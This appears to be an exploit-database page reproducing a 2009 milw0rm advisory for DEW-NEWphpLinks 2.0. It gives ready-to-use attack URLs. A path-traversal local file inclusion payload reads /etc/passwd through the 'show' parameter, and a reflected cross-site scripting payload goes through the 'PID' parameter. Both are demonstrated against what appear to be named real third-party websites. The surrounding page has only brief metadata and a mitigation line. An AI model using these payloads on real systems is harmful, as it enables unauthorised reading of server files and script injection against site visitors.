header-logo
Suggest Exploit
vendor:
DEW-NEWphpLinks
by:
d3v1l [Avram Marius]
7,5
CVSS
HIGH
LFI/XSS
22, 79
CWE
Product Name: DEW-NEWphpLinks
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2009

DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities

DEW-NEWphpLinks 2.0 is vulnerable to Local File Inclusion and Cross-Site Scripting. An attacker can exploit this vulnerability to gain access to sensitive information and execute malicious scripts in the browser of the victim.

Mitigation:

Update to the latest version of DEW-NEWphpLinks 2.0
Source

Exploit-DB raw data:

[~]------------------------------------------------------------------------------------------------
[~] DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities
[~]
[~] http://www.dew-code.com
[~]  
[~] 
[~] -----------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 25.04.2009
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members(https://security-shell.ws/forum.php)-(http://security-sh3ll.blogspot.com)
[~]
[~] milw0rm staff
[~]-------------------------------------------------------------------------------------------------
[~] Exploit :- LFI - index.php?show=
[~]
[~] http://site.com/index.php?show=../../../../../../etc/passwd%00
[~]  
[~] Ex :-
[~]
[~] http://www.customprintedsweatshirts.com/links/index.php?show=../../../../../../etc/passwd%00  
[~] http://directory.custom-printed-t-shirts.com/index.php?show=../../../../../../etc/passwd%00
[~]-------------------------------------------------------------------------------------------------
[~] XSS on search module works fine on ALL version
[~]  
[~] Ex :- XSS - index.php?PID=
[~] 
[~] http://directory.custom-printed-t-shirts.com/index.php?PID="><script>alert("test")</script>
[~] http://www.customprintedsweatshirts.com/links/index.php?PID="><script>alert("test")</script>
[~]-------------------------------------------------------------------------------------------------

# milw0rm.com [2009-04-27]

Navigation

Suggest Exploit

Services By CQR